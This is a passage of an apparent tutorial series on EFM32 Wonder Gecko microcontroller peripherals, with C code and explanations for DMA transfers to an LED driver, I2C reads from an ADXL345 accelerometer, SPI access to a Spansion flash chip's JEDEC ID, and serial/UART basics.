		GPIO_PinOutClear(CONTROL_PORT, VPRG_PIN);
	}

	dma_in_progress = true;

	// Start the DMA transfer.
	DMADRV_MemoryPeripheral(
			dma_channel,
			dmadrvPeripheralSignal_USART1_TXBL,
			(void *) &(USART1->TXDATA),
			stream_buffer,
			true,
			length,
			dmadrvDataSize1,
			dma_transfer_complete,
			NULL);

	while (dma_in_progress)
		;

	//EMU_EnterEM2(true);
	for (volatile int i=0; i < 10000; i++)
		;

	// Latch the data
	GPIO_PinOutSet(CONTROL_PORT, XLAT_PIN);
	for (volatile int i=0; i < 100; i++)
		;
	GPIO_PinOutClear(CONTROL_PORT, XLAT_PIN);
}

You can see that we replaced the for loop that sent data to the USART within write_serial_stream with the DMADRV_MemoryPeripheral function, which means that the data is flowing from memory to a peripheral. There is a companion function that goes the other way. Before the DMADRV_MemoryPeripheral function, we set a flag for dma_in_progress, and then waited for it to clear before moving on. The flag clear takes place inside the dma_transfer_complete callback function when the DMA transfer completes.
However, instead of waiting in a while loop for the DMA to finish, we could have let the MCU go work on something else or enter a sleep state, as long as we take care ahead of time to configure the DMA interrupt to wake the MCU from sleep.

You should notice that the stream_buffer array was moved outside of the write_serial_stream function. It is super important that you make all variables that are referenced by DMA globally persistent. In our example, it makes no difference because we wait for the DMA transfer to finish, but as soon as we remove that blocking logic and allow the system to leave this function, a local stream_buffer variable would be reclaimed by the system for other purposes and the data would become mangled. By making stream_buffer global, it is preserved even after the write_serial_stream function exits, when the DMA transfer might still be in progress.

This should have been an easy introduction to DMA transfers. We will revisit DMA in future chapters to set up more complicated modes and really try to melt your brain.

This completes the chapter on interfacing with an external LED driver over a non-standard serial stream interface. By now, you should be well on your way to becoming a competent solderer and getting to know your way around the initialization of a few EFM32 peripherals. You should also feel like something of an expert in the types and applications of LEDs.

Nov 08 2017, 9:02 PM

This is part 2 of a four-part series on using the I2C bus to interface an accelerometer. In part 1, we learned how to physically connect the accelerometer to the EFM32 Starter Kit board, and how an I2C bus operates. The background theory about how accelerometers work and their uses was also covered. In this section, we will learn how to configure the EFM32 for the I2C bus through the em_i2c driver library. We will illuminate an LED on the Starter Kit to indicate the successful reading of the Device ID register on the accelerometer.
I2C Software Configuration

Now you should have your Starter Kit and ADXL345 connected and ready to go. For this section, I chose to run the Simplicity Configurator tool to create all of the necessary HFXO, GPIO, USART (for serial port output later), and I2C peripheral initialization code for me. You can look at Lesson 8 on Serial Communication where that tool was first demonstrated. I went through the steps to select all of the peripherals that I wanted to use, and the tool created this block of initialization code within the enter_DefaultMode_from_RESET function in the resulting InitDevice.c file, located in the src directory of the project that the Configurator created:

// $[Library includes]
#include "em_system.h"
#include "em_emu.h"
#include "em_cmu.h"
#include "em_device.h"
#include "em_chip.h"
#include "em_gpio.h"
#include "em_i2c.h"
#include "em_usart.h"
// [Library includes]$

//==============================================================================
// enter_DefaultMode_from_RESET
//==============================================================================
extern void enter_DefaultMode_from_RESET(void)
{
	// $[Config Calls]
	CMU_enter_DefaultMode_from_RESET();
	HFXO_enter_DefaultMode_from_RESET();
	LFXO_enter_DefaultMode_from_RESET();
	USART0_enter_DefaultMode_from_RESET();
	I2C0_enter_DefaultMode_from_RESET();
	PORTIO_enter_DefaultMode_from_RESET();
	// [Config Calls]$
}

The tool also copied over the library files like em_i2c.c and the others that it includes at the top of the file. Within each of these functions, there is more initialization code.
For example, the default I2C initialization code is here:

//==============================================================================
// I2C0_enter_DefaultMode_from_RESET
//==============================================================================
extern void I2C0_enter_DefaultMode_from_RESET(void)
{
	// $[I2C0 initialization]
	I2C_Init_TypeDef init = I2C_INIT_DEFAULT;

	init.enable = 1;
	init.master = 1;
	init.freq = I2C_FREQ_STANDARD_MAX;
	init.clhr = i2cClockHLRStandard;

	I2C_Init(I2C0, &init);
	// [I2C0 initialization]$
}

This code shows that I want it to be enabled, functioning as a master I2C device, running at the standard I2C max frequency. I wasn't sure what the i2cClockHLRStandard enum was all about, so like always, I clicked on the name, then right-clicked and selected Open Declaration. That brought me to the header file which described all of the possible enums for this init.clhr member. I found a comment that said "Set to use 4:4 low/high duty cycle" for this enum. This has to do with how long to keep the clock high versus low during a single I2C bit time. I didn't know any reason why I would want anything other than the default, so I left it alone.

I then edited my main.c file to include my standard utilities.h helper file and called the setup function, which sets up the SysTick interrupt so that my delay function will work. I then included the call to the initialization function found in the InitDevice.c file. I also added the library header file for I2C, which is em_i2c.h. Note that there are some older examples in the Simplicity Studio installation directory that are based on an older i2cspm.h library, which I am not using here.
At this point, I had the following code:

#include "em_device.h"
#include "em_chip.h"
#include "InitDevice.h"
#include "em_i2c.h"
#include "utilities.h"

/**************************************************************************//**
 * @brief Main function
 *****************************************************************************/
int main(void)
{
	CHIP_Init();

	enter_DefaultMode_from_RESET();

	setup_utilities();

	// Code to interface I2C device goes here...

	// Infinite loop
	while (1)
	{
	}
}

Thanks to the Configurator tool and the previously-created utilities helper file, I only have to add two lines of code to get everything configured and ready to go. And, I won't forget to enable the clock for any of the peripherals, like I always tend to do, since the Configurator took care of that for me.

Read the Device ID

The first thing that I do when working with a new part is to read the Device ID register. That is a good way to work out any issues with the libraries, connections, and conventions used in the device. In order to read a register on an I2C device, you have to first perform a write cycle to the offset of the register that you are targeting on the device, and then immediately perform a read cycle to fetch the value of that register. Confusing? It certainly can be. But fortunately, the em_i2c peripheral inside of the MCU and associated software library take a lot of that work off of your hands by defining the following I2C transaction types:

	I2C_FLAG_WRITE
	I2C_FLAG_READ
	I2C_FLAG_WRITE_READ
	I2C_FLAG_WRITE_WRITE

The first two types of I2C flags, I2C_FLAG_WRITE and I2C_FLAG_READ, are used in situations where no register offsets are needed. The ADXL345 device has no use for these two types because there is no data that can be read or written without first specifying a register offset. However, the second two types of I2C flags, I2C_FLAG_WRITE_READ and I2C_FLAG_WRITE_WRITE, are used to specify the register and memory offsets inside an I2C device.
These types are illustrated here by what you see on the I2C bus if viewed on a logic analyzer or scope. Only an I2C master can start an I2C transaction, and it does so by setting the SDA signal low while SCL is high, which is called a START bit. This is the event that alerts all slaves on the bus to monitor the next seven bits to see if the forthcoming I2C transaction is directed at them. The master then transmits the 7 bits of address and indicates with the eighth bit if the data packet that follows is a read or a write. The ninth bit is driven only by the slave, which is the acknowledge bit, or simply ack bit. If the slave drives the SDA pin low for the ack bit, it tells the master that it recognized the address as its own and it is ready to read or write the data packet(s). If the slave fails to drive the ack bit low (which is a NACK condition), either it is not recognizing the address packet as its own address or it is not ready for the transaction. It is completely possible that there is no slave there at all. The ack bit is key. If the slave drives the ack bit low, you have proof of life.

After the ack bit, one or more data packets of 8 bits in length each are transferred, each with an ack bit between them, and the whole I2C frame is then terminated with a STOP bit, which is sort of the inverse of the START bit (a rising edge on SDA while SCL is high).

The 7-bit device address packet in the beginning of a frame is reserved for the I2C device address on the I2C bus, and it is required at the beginning of every I2C transaction to select the slave that is targeted by the transaction. It is easy to forget that this address is the address of the I2C device itself and not an offset into the device's register or memory space. Then, the R/W bit in that first address packet indicates the direction that data is to flow in the next sequence of data packets that follow, either from master to slave (write) or slave to master (read).
The tricky part is reading or writing a register or memory location on an I2C device, because it takes two I2C frames to make this happen. The first I2C frame contains the I2C address of the device, with the R/W bit set low, indicating that the next data packet(s) will be driven by master to slave. Those write data packets are either register offsets or memory locations that will be read or written by the master in the next I2C frame, and can be a single byte or multiple bytes, depending on the I2C slave's address space. Then, another START bit is sent (called a repeated start), and the I2C device address is once again sent, followed by the R/W bit. The R/W bit in the second I2C frame is what dictates whether or not the data packet(s) of the second I2C frame will be sent from master to slave or slave to master, i.e. a write or a read data packet.

Why is all of this important? Well, as long as you write perfect code and always connect devices together perfectly, you would never have to worry about all of that interface minutiae. However, if you are human and make mistakes, you will need to break out the scope and figure out what went wrong. When I initially tried to read the Device ID register of the ADXL345, I ran into a few problems. I tried to run an I2C_FLAG_WRITE_READ cycle to fetch the Device ID and compare it to the value of 0xE5, as is published in the ADXL345 specification. I wrote the following functions to help me do that:

#define ADXL345_ADDRESS		0x53 << 1	// This shift is important!
#define DEVICE_ID		0xE5

#define CMD_ARRAY_SIZE		1
#define DATA_ARRAY_SIZE		10

// Globals for persistent storage
uint8_t cmd_array[CMD_ARRAY_SIZE];
uint8_t data_array[DATA_ARRAY_SIZE];

// Used by the read_register and write_register functions
// data_array is read data for WRITE_READ and tx2 data for WRITE_WRITE
void i2c_transfer(uint16_t device_addr, uint8_t cmd_array[], uint8_t data_array[],
		uint16_t cmd_len, uint16_t data_len, uint8_t flag)
{
	// Transfer structure
	I2C_TransferSeq_TypeDef i2cTransfer;
	I2C_TransferReturn_TypeDef result;

	// Initialize the I2C transfer
	i2cTransfer.addr        = device_addr;
	i2cTransfer.flags       = flag;
	i2cTransfer.buf[0].data = cmd_array;
	i2cTransfer.buf[0].len  = cmd_len;
	i2cTransfer.buf[1].data = data_array;
	i2cTransfer.buf[1].len  = data_len;

	// Set up the transfer
	result = I2C_TransferInit(I2C0, &i2cTransfer);

	// Continue until the transfer is done
	while (result != i2cTransferDone)
	{
		if (result != i2cTransferInProgress)
		{
			DEBUG_BREAK
		}
		result = I2C_Transfer(I2C0);
	}
}

// Read a config register on an I2C device
// Tailored for the ADXL345 device only, i.e. 1 byte of TX
uint8_t i2c_read_register(uint8_t reg_offset)
{
	cmd_array[0] = reg_offset;
	i2c_transfer(ADXL345_ADDRESS, cmd_array, data_array, 1, 1, I2C_FLAG_WRITE_READ);
	return data_array[0];
}

The i2c_transfer function is generic, and could be used for any kind of I2C device for any of the four types of I2C transactions. I then created the i2c_read_register function tailored to the ADXL345 slave to make it easier to read a single-byte value of a register on this device. Once those functions were there, I called them at the bottom of my main function:

	delay(100);

	I2C_Init_TypeDef i2cInit = I2C_INIT_DEFAULT;
	I2C_Init(I2C0, &i2cInit);

	// Offset zero is Device ID
	uint16_t value = i2c_read_register(0);

	// Set an LED on the Starter Kit if success
	if (value == DEVICE_ID)
	{
		set_led(1,1);
	}

	// Infinite loop
	while (1)
	{
	}

It didn't work. The I2C cycle never finished and was stuck in the while (result != i2cTransferDone) loop. I found the following waveform on the scope:

[Figure: Scope capture of the glitched bus] Channel 1 (orange) is SCL and channel 2 (blue) is SDA.

This didn't look like anything I was expecting. There should be two 8-bit pulses for a read cycle. After some single-stepping in Simplicity Studio, I saw that the routing of the I2C peripheral to the GPIO pins caused a glitch on the I2C bus that looked like a START signal to the ADXL345. The order in which the Simplicity Configurator had configured my I2C pins in the InitDevice.c file was backwards. It was configuring the GPIO output and then routing the I2C peripheral to the GPIO pins. The problem with the Configurator will probably already be corrected by the time you read this. Stuff like this happens, and you have to question everything. So I reordered the calls so that the routing happens first and the configuration of the GPIO pins happens last, and the glitch disappeared.

	// NOTE: These cannot come before I2C ROUTE operations or a glitch will appear!
// $[Route Configuration]
/* Module I2C0 is configured to location 1 */
I2C0->ROUTE = (I2C0->ROUTE & ~_I2C_ROUTE_LOCATION_MASK) | I2C_ROUTE_LOCATION_LOC1;
/* Enable signals SCL, SDA */
I2C0->ROUTE |= I2C_ROUTE_SCLPEN | I2C_ROUTE_SDAPEN;
/* Module PCNT0 is configured to location 1 */
PCNT0->ROUTE = (PCNT0->ROUTE & ~_PCNT_ROUTE_LOCATION_MASK) | PCNT_ROUTE_LOCATION_LOC1;
/* Enable signals RX, TX */
USART0->ROUTE |= USART_ROUTE_RXPEN | USART_ROUTE_TXPEN;
// [Route Configuration]$

// Relocated from above, so that the pin configuration happens after the routing
// $[Port E Configuration]
/* Pin PE10 is configured to Push-pull */
GPIO->P[4].MODEH = (GPIO->P[4].MODEH & ~_GPIO_P_MODEH_MODE10_MASK) | GPIO_P_MODEH_MODE10_PUSHPULL;
/* Pin PE11 is configured to Input enabled */
GPIO->P[4].MODEH = (GPIO->P[4].MODEH & ~_GPIO_P_MODEH_MODE11_MASK) | GPIO_P_MODEH_MODE11_INPUT;
// [Port E Configuration]$
// $[Port F Configuration]
// [Port F Configuration]$

After I fixed that problem, I was now seeing two 8-bit cycles, but the device ID still wasn't correct. I hate it when that happens, and it happens all the time. You fix a real bug, only to still be facing the same exact problem. I examined the now healthier-looking waveform on the scope and noticed that the I2C device address was shifted over by one bit. The ADXL345 breakout board has an I2C address of 0x53. I had sent this address to the em_i2c library routines exactly like that. But the I2C address is only seven bits wide, and the em_i2c library expects those seven bits to be left justified, so that the zero-th bit is a "don't care." This was clearly documented in the em_i2c library header file, but I missed it:

/**
 * @brief
 *   Address to use after (repeated) start.
 * @details
 *   Layout details, A = address bit, X = don't care bit (set to 0):
 *   @li 7 bit address - use format AAAA AAAX.
 *   @li 10 bit address - use format XXXX XAAX AAAA AAAA
 */
uint16_t addr;

So once I did a left shift on the I2C device address (which I have already fixed in the example code above) with the statement shown here, the Device ID was successfully returned back to me and the light lit on the Starter Kit.

#define ADXL345_ADDRESS    0x53 << 1

This is what an I2C register read is supposed to look like. The first 8-bit cycle is the write of the address from the MCU to the device, and the second 8-bit cycle is the read data returning from the device.

Now if you can get that little test LED to light up on your Starter Kit and ADXL345 breakout board, you are finally ready to start doing fun things with your accelerometer! We will start experimenting with the accelerometer measurements in the next post.

In this chapter, we will learn how to use the I2C bus to configure and read the live acceleration data from an accelerometer. We will connect the circuit to your Starter Kit, create interface code, and then output the measurement data over a serial port to your computer in real time. We will then create an interrupt routine to detect a "freefall" event to trigger an LED on the Starter Kit.

This chapter aims first to teach how to connect to an I2C device with the help of the EFM32 I2C library. I2C is a commonly utilized communication interface for embedded designs. Because it requires only two pins on the MCU, and many devices can share those two pins, it is very versatile.

In order to give us an interesting I2C device to talk to on the other end of that bus, I chose an accelerometer. An accelerometer is a device that can measure acceleration on one or more axes. It can be used to detect the orientation of your device relative to the earth's gravity. This can be useful for tilt sensors, to tell your object if it is right-side up, or upside-down.
But they can also measure acceleration due to movement, which would be good to know if your device needs to know how it is moving through space. And it doesn't just tell you that it is moving, but how much it is accelerating, and in which direction, even if that means that there is no acceleration on your device at all, as in a free-fall situation. That information could be helpful if your device is delicate and needs to prepare itself for a hard landing!

Accelerometers are a relatively new invention available to electronics developers. Long ago, an accelerometer was a large mechanical device that contained springs and plates. They were heavy, large, and expensive. That has changed for two reasons: 1) miniaturization of the mechanical parts of an accelerometer has shrunk it down to fit on a single surface-mounted chip, and 2) they are employed in smart phones the world over, which drives down the cost for the rest of us.

Materials Needed for This Lesson

Accelerometer Theory

Modern accelerometers are Micro Electro-Mechanical Systems (MEMS) devices, which means that they are able to fit on a small chip inside the smallest of gadgets. One method to measure acceleration employed by MEMS accelerometers is to utilize a tiny conductive mass suspended on springs. The acceleration of the device causes the springs to stretch or contract, and the deflection of the conductive mass can be measured through a change in capacitance to nearby, fixed plates.

Accelerometers are specified by the following features:

Axes of the ADXL345 Accelerometer

The ADXL345 accelerometer used in this lesson is a digital-output accelerometer that has three axes and a selectable g-range of 2/4/8/16 g's. It connects to the MCU using an I2C or SPI interface. Note that we are going to demonstrate the I2C bus for this lesson, but I2C limits the measurement frequency to 800Hz, whereas SPI allows a higher frequency of 1600Hz. Keep that in mind if your application requires the higher frequency.
Connect the Accelerometer to the Starter Kit via I2C

More information about I2C can be found in the official specification here. Sparkfun has a good tutorial here, and there's another good tutorial from Robot Electronics here.

Your ADXL345 breakout board is shipped without header pins attached. You have to solder them to the board, as was demonstrated in Lesson 4, where we did the same thing to our Starter Kit.

In order to connect the accelerometer to the Starter Kit via the I2C bus, I had to figure out which pins were available on the Starter Kit that were connected to an I2C peripheral inside the Wonder Gecko MCU. I started with the Datasheet for the Wonder Gecko, which I found in the tile view on the Simplicity Studio home page. I then looked to section 4.2 Alternate Functionality Pinout and found the available I2C interfaces and the locations where those interfaces routed to GPIO pins. I found that location 0 of I2C0 was not available on the Starter Kit, but location 1 was. I connected PD7 to the SCL pin on the ADXL345 breakout board and PD6 to the SDA pin on the breakout board. I then connected 3V3 on the Starter Kit to the VIN pin on the ADXL345 breakout board. I then placed a wire between the GND pins on each board.

NOTE: The 3V3 pin on the ADXL345 breakout board is an output pin to power other devices, not an input pin for the board. The input pin is labeled as VIN.

Note that you could have built your own breakout board if you wanted to use an I2C device that had no breakout board or evaluation board available. Follow the instructions in Lesson 9, where a flash chip was given a breakout board with the help of a blank Schmartboard breakout board.

In the next section, we will cover software configuration of the I2C interface on the MCU for the ADXL345 accelerometer.

This is a five part series on the SPI communication protocol.
In the first section, we learned all about SPI and how to make a SPI flash breakout board from a bare chip. In this section, we will connect the SPI flash to the EFM32 Starter Kit and then write some code with the help of the USART library to fetch the JEDEC ID from the register on the part. We will continue to rely on the Spansion flash chip's spec to accomplish this.

Flash Chip to MCU Connections

The SPI bus requires either three or four wires, depending on the mode. I will demonstrate the use of SPI using the four-wire mode, which is more common in my experience than the three-wire mode. The EFM32 USART supports the three-wire mode and calls this mode Synchronous Half Duplex Communication. In that case, the MISO line is not used and the MOSI line becomes a bidirectional signal. You can read more about it in the Reference Manual.

In SPI terminology, a SPI device can be a master or a slave device, at any given moment in time. The USART peripheral in the EFM32 can be configured as either one. One device has to be the master and the other a slave for a single SPI transaction. We will configure the MCU as master since the MCU is driving the interaction with the flash chip. We might someday configure the MCU as a slave if we have another MCU in a system and intend to share information between the two of them. But we could configure our USART in the MCU dynamically to be a slave on one cycle, then a master on the next cycle.

The Master Out Slave In (MOSI) terminology is an improvement over the RX/TX nomenclature of the serial port connections. Now, a master device's MOSI output pin connects directly to a slave's MOSI input pin, and MISO pin to MISO pin. This is great, because the connections are made between like-named, or at least similarly-named pins. Unfortunately, the Data Sheet tables for the USART pins don't specifically list MOSI/MISO, and you still need to know to map the USART TX pins to MOSI and the USART RX pins to MISO.
This information is covered in the Reference Manual for the USART peripheral. In addition, some devices don't use the MOSI/MISO naming and instead use SDI, DI, SI, etc. for an input. If you can find the one that says input, attach that to the master's MOSI and you will do fine.

The flash chip breakout board has additional signals that must be attached to your Starter Kit. The first thing to look for are the power and ground connections. Whenever you are connecting your MCU to an external device, you need to take a look at the voltage requirements in the spec for that device. This is listed in the Electrical section for the Spansion chip. The Supply Voltage (also known as Vcc and sometimes called Vdd) requires between 2.7V and 3.8V. Sometimes you will find chips that require 1.8V or 2.8V, which would then need an external power supply to be provided. In this case, the chip can be powered directly from the Starter Kit's 3.3V supply pins that are labeled as 3V3.

Connect the signals as shown in the table below. We are using specific pins of USART1 location 1 for the SPI signals, since those are brought out to pins on the Starter Kit, and just any old GPIOs for the other signals.

Signal                             Spansion Flash Breakout Pin    Wonder Gecko GPIO Pin
CS#   (Chip Select, active low)    1 – top left                   PD3 – USART CS
SO    (MISO)                       2                              PD1 – USART RX (MISO)
WP#   (Write Protect, active low)  3                              PD4 – Chosen at random
GND                                4 – bottom left                GND
SI/SO (MOSI)                       5 – bottom right               PD0 – USART TX (MOSI)
SCK   (Clock)                      6                              PD2 – USART CLK
HOLD# (active low)                 7                              PD5 – Chosen at random
VCC                                8 – top right                  3V3

SPI Software Configuration

Now that everything is wired up, it is time to communicate with the flash memory chip from the MCU with software. You can use Simplicity Configurator to configure the part like we did in the last lesson, or manually configure your USART to connect to the SPI signals CLK, CS, MOSI (TX in the USART) and MISO (RX in the USART). I will demonstrate how to do it manually for this chapter.
There is a decision to be made about the clock mode when configuring the clock signal in the USART software setup. With SPI, very little is set in stone. It is up to the chip designers to determine exactly how the electrical signals should operate. The USART provides configuration registers that handle the polarity and phase in order to work with all devices. These are referred to as CPOL or CLKPOL (depending on the chip) for the clock polarity and CPHA or CLKPHA for the clock phase. The clock polarity can be set to either 0 or 1, which determines the idle state of the clock line. The clock phase can also be 0 or 1, which determines whether data is latched on the rising or falling edge of the clock signal. This gives four possible combinations, known as clock modes 0 through 3. There are diagrams in the Reference Manual that describe all four modes. All that really matters to us at this point is that we pick the right mode for the Spansion chip. If we look in the spec for the Spansion flash chip, we see that it can operate in either clock mode 0 or clock mode 3.

When configuring the CS line, there is a decision to be made about whether or not the USART peripheral will control the CS line automatically, known as AUTOCS, or if the software will explicitly control the CS line to the slave SPI device. We will need to control the CS line explicitly, because if we were to pick AUTOCS mode and fail to feed the USART the two bytes of data fast enough, the USART-controlled CS line will go high in the middle of the above waveform, and the device will essentially forget all about the command we requested. We need to drive the CS line low for the entire time as shown in the diagram. The AUTOCS mode is better used when we are sending bytes to the USART through another hardware mechanism rather than software.

We will leave the SPI bus frequency at the default of 1MHz.
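The clock-mode numbering described above is nothing more than the CPOL and CPHA bits packed together. A quick sketch (the helper name here is mine, not from emlib):

```c
// SPI clock mode = (CPOL << 1) | CPHA
// Mode 0: clock idles low,  CPHA = 0
// Mode 3: clock idles high, CPHA = 1
int spi_clock_mode(int cpol, int cpha)
{
	return (cpol << 1) | cpha;
}
```

So the Spansion chip's two supported modes correspond to (CPOL=0, CPHA=0) and (CPOL=1, CPHA=1).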
The table in the Spansion spec states that the chip supports SPI bus frequencies up to at least 44MHz, but you should be aware that the maximum that the EFM32 chip can reach is about one half of the HFPER clock frequency. With the default HFRCO clock setup, that means it can only reach about 7MHz. Plus, our breadboard setup is more likely to see noise that could cause glitches at higher frequencies. void usart_setup() { // Set up the necessary peripheral clocks CMU_ClockEnable(cmuClock_GPIO, true); CMU_ClockEnable(cmuClock_USART1, true); // Enable the GPIO pins for the USART, starting with CS // This is to avoid clocking the flash chip when we set CLK high GPIO_PinModeSet(gpioPortD, 3, gpioModePushPull, 1); // CS GPIO_PinModeSet(gpioPortD, 0, gpioModePushPull, 0); // MOSI GPIO_PinModeSet(gpioPortD, 1, gpioModeInput, 0); // MISO GPIO_PinModeSet(gpioPortD, 2, gpioModePushPull, 1); // CLK // Enable the GPIO pins for the misc signals, leave pulled high GPIO_PinModeSet(gpioPortD, 4, gpioModePushPull, 1); // WP# GPIO_PinModeSet(gpioPortD, 5, gpioModePushPull, 1); // HOLD# // Initialize and enable the USART USART_InitSync_TypeDef init = USART_INITSYNC_DEFAULT; init.clockMode = usartClockMode3; init.msbf = true; USART_InitSync(USART1, &init); // Connect the USART signals to the GPIO peripheral USART1->ROUTE = USART_ROUTE_RXPEN | USART_ROUTE_TXPEN | USART_ROUTE_CLKPEN | USART_ROUTE_LOCATION_LOC1; } All of that work and we still don’t have anything that we can test to see if we did it right. We still need some code to actually initiate a SPI cycle and we need to find a destination for that cycle that will yield a meaningful result to prove that the SPI command worked or not. For this purpose, I turn to identification registers. The chip designers of SPI parts will usually give you a softball register that always returns a non-zero fixed value to let you test basic connectivity and signs of life. 
In this case, that register in the Spansion SPI Flash is the JEDEC ID, read with the 0x9F command. It actually has three distinct, non-zero fixed values that it can return one after another. So we can test to make sure that we find the first value, then expand our test case to make sure that we find all three values.

#include "utilities.h"   // Re-used from earlier lesson for delay function

#define JEDEC_ID_CMD    0x9F

int main(void)
{
	CHIP_Init();

	usart_setup();
	setup_utilities();

	delay(100);

	uint8_t result[3];
	uint8_t index = 0;

	GPIO_PinModeSet(gpioPortD, 3, gpioModePushPull, 0);

	// Send the command, discard the first response
	USART_SpiTransfer(USART1, JEDEC_ID_CMD);

	// Now send garbage, but keep the results
	result[index++] = USART_SpiTransfer(USART1, 0);
	result[index++] = USART_SpiTransfer(USART1, 0);
	result[index++] = USART_SpiTransfer(USART1, 0);

	GPIO_PinModeSet(gpioPortD, 3, gpioModePushPull, 1);

	// Check the result for what is expected from the Spansion spec
	if (result[0] != 1 || result[1] != 0x40 || result[2] != 0x13)
	{
		DEBUG_BREAK
	}

	while (1)
		;
}

Execute the code shown and break in on the while loop. You should see a value of 1 in the result array at the 0 position. This gives us good confidence, with only about a 1-in-254 chance of coincidence, that we are reading the register that we think we are reading. Had this register's default been zero or 0xff, we could not be sure that we were reading the right register, because 0xff is the default state of flash memory at reset and zero is the usual default state for most configuration registers. But since the default value for this Manufacturer ID is 1, we can be confident that this SPI driver is beginning to work.

You should notice something funny going on in this code. We call USART_SpiTransfer once and do nothing with the return value, and only start keeping the results on the following transfers. That is because a four-wire SPI bus is ALWAYS bidirectional.
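That always-bidirectional behavior can be modeled as two 8-bit shift registers clocked in a ring: on every clock, each side shifts one bit out while capturing one bit in. A host-side sketch of one 8-clock transfer (this models the bus itself, it is not the USART driver):

```c
#include <stdint.h>

// Model one 8-bit SPI transfer: master and slave each drive a byte,
// and each ends up holding the byte the other side sent.
void spi_exchange(uint8_t *master_reg, uint8_t *slave_reg)
{
	for (int clk = 0; clk < 8; clk++)
	{
		// The MSB of each register appears on MOSI/MISO for this clock
		uint8_t mosi = (*master_reg >> 7) & 1;
		uint8_t miso = (*slave_reg  >> 7) & 1;

		// Both sides shift left and capture the incoming bit
		*master_reg = (uint8_t)((*master_reg << 1) | miso);
		*slave_reg  = (uint8_t)((*slave_reg  << 1) | mosi);
	}
}
```

After eight clocks the two bytes have traded places, which is why the master receives *something* on the very same transfer that carries the command out.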
When a master drives a cycle out on MOSI, the slave is required to drive something on MISO for every clock edge, even on the first clock. But since the slave doesn't even know what is being asked until after that first clock, the slave device will either send back a useless value, or sometimes slave devices will use this first bit time as a chance to send back a status message. You have to examine the SPI chip's spec to find out what it will do. Once the command from the first bit time is latched and processed by the slave, it can respond with the necessary information on the second SPI transfer.

The code verifies that all three values from the JEDEC ID command are as expected, which gives us near certainty that we have indeed read from the Flash SPI device properly and the USART driver is working well so far.

In the next section, we will take a look at these SPI waveforms on the oscilloscope and learn about more advanced SPI topology.

In this chapter, we will open our embedded board up to exchange information with the outside world. Up until now, the only link that we have used is the built-in USB programming interface on the Wonder Gecko Starter Kit and some GPIO lines for controlling a few discrete components. Now we will share data across a communication protocol. Our EFM32 has quite a few built-in communication standards. It is quite the Swiss army knife. We will begin learning about the simplest of these interfaces in this chapter before learning about more in upcoming chapters. You can use these communication protocols to enrich your project by connecting multiple smart devices together and sharing information. The IoT is all about connected devices, and this is where it begins.

First, we will cover the basics of serial communication protocols, terminal emulator programs, UARTs, USARTs, and serial cables.
Then we configure the chip for USART communication using the Simplicity Studio Configurator tool, which takes care of making all of the connections and communication settings for the USART, through the GPIO block and to the outside world. We will build an interrupt handler to let us know when there is data received on the serial interface and see what the signals look like on an oscilloscope, to make sure that things are really toggling like we expect. Finally, we will construct a print function so that we can use this newly acquired connection to aid in our debugging process.

Communication Classes

Communication is achieved between devices via three classes of communication methods:

The parallel communication method is generally the fastest class. In a future lesson, you will learn about parallel communication in order to transfer large amounts of data quickly to graphical displays. When your peripheral is on the same PCB as the MCU, a parallel interface makes a lot of sense if fast speeds are needed and pins are available. But when your embedded system needs to communicate with other external devices, all of those conductors create complicated connectors and bulky, expensive cabling. In the early days of the PC, all computers had a parallel port that allowed transferring large amounts of data from the PC to a peripheral, normally a printer. The cables were never cheap or light.

A serial communication method forces the transmitted data to march in a single-file line, as all of the data flows bit-by-bit, one after another. This is generally a slower form of communication but requires fewer wires between devices. This type of communication can be transmitted in a synchronous mode, which means that there is a clock line to coordinate the bits at the other end, or without a clock, which is an asynchronous mode. I will be using and explaining asynchronous mode in this lesson. The large majority of your embedded system operates in a synchronous mode.
Nothing ever happens if the clock doesn't toggle. Therefore, the devices that utilize asynchronous signals must be able to bridge the gap between clocked and clock-less domains. This presents some challenges in finding proper clock sources.

The standard that is most often used for asynchronous serial communication is the RS-232 standard, which is based upon the UART communication protocol. More on this later. This standard describes how devices asynchronously communicate information, including the voltages and optional flow control signals. It is not required to make use of this particular standard, but it is the most common and the one that we will be using for this lesson. However, just because there is a standard doesn't mean that all systems will work well together. The standard doesn't specify how software should deal with the data that is transferred. In addition, the RS-232 interface specifies +5V and -5V as part of the electrical signaling, and we will not be implementing that part, as both the EFM32 MCU and the USB-to-serial port adapter don't use these voltages, but instead use 3.3V and 0V as the logic 1 and logic 0 values. RS-232 also adds optional flow control signals, such as Request To Send (RTS) and Clear To Send (CTS), to manage the bidirectional transmission of data between two systems, usually modems, and we don't need all of those extra signals. So what I am referring to as RS-232 here is really just the packet format and not much more.

This happens a lot in technology. It's hard to keep track of all of the nuances between different specs and even different versions of specs. The people who make the components get confused at times too. That's why it's so hard to get things to work together sometimes!

Serial Interfaces and Terminal Emulator Programs

In the '80s and '90s, all computers shipped with a serial port that had a ridiculously large DB9 connector, by today's standards, and implemented the full RS-232 standard.
Sometimes it was necessary to enter the computer's BIOS setup utility and turn them on, or assign them to a different address range or IRQ lines so as not to conflict with your groovy new drawing pad or speech synthesizer. Those were the days. Today, you will most likely need a USB-to-serial adapter to access this old interface. You can use a breadboard-friendly CP2104-MINIEK breakout board for this task. The drivers are available on the Silicon Labs website so that your computer will detect this breakout board.

USB has supplanted RS-232 for most peripheral needs, and wireless links are replacing those. But the lowly serial port is still used wherever a design calls for a cheap and easy way to get some rudimentary console-based access to a host system. Embedded designers routinely choose serial ports for diagnostics and debug of heavyweight computers that otherwise have multi-gigabit interfaces. When those beasts fail to boot up properly, the serial port can be the salvation to figure out what went wrong.

Often, the data that is transmitted via a serial interface is ASCII text for human consumption or commands to be sent to a device. ASCII stands for American Standard Code for Information Interchange and is the binary code behind all of the text that makes up the alphabet, punctuation characters, and other miscellaneous characters. But it is also possible to transfer data over a serial interface in a pure binary format, in order to program a part with new machine instructions, for example.

To interface with the serial port on your computer, you will need to find a suitable terminal emulator program. A computer terminal was widely used in the days before PCs as the primary human interface to mainframe computers. It had a keyboard, a display screen, and just enough smarts to send and receive RS-232 data.
Today, since our computers are so much more capable than just displaying text and accepting keystrokes, you can download a program that emulates a terminal in a window on your computer. This terminal will be the portal in which you will communicate with your embedded device.

Windows users of any recent installation need to turn to external software to be able to access the serial port. PuTTY and TeraTerm are two of my favorite free terminal emulators. Download and install one of those now. Note that Linux and Mac computers have a built-in terminal and a built-in serial port device at /dev/ttyX, in which X is the identifier of the serial port. Serial input and output can be routed to the built-in terminal with just a simple command like:

screen /dev/ttyUSB0 115200

where ttyUSB0 is wherever your USB-to-serial port adapter is located, and 115200 is the baud rate, described below.

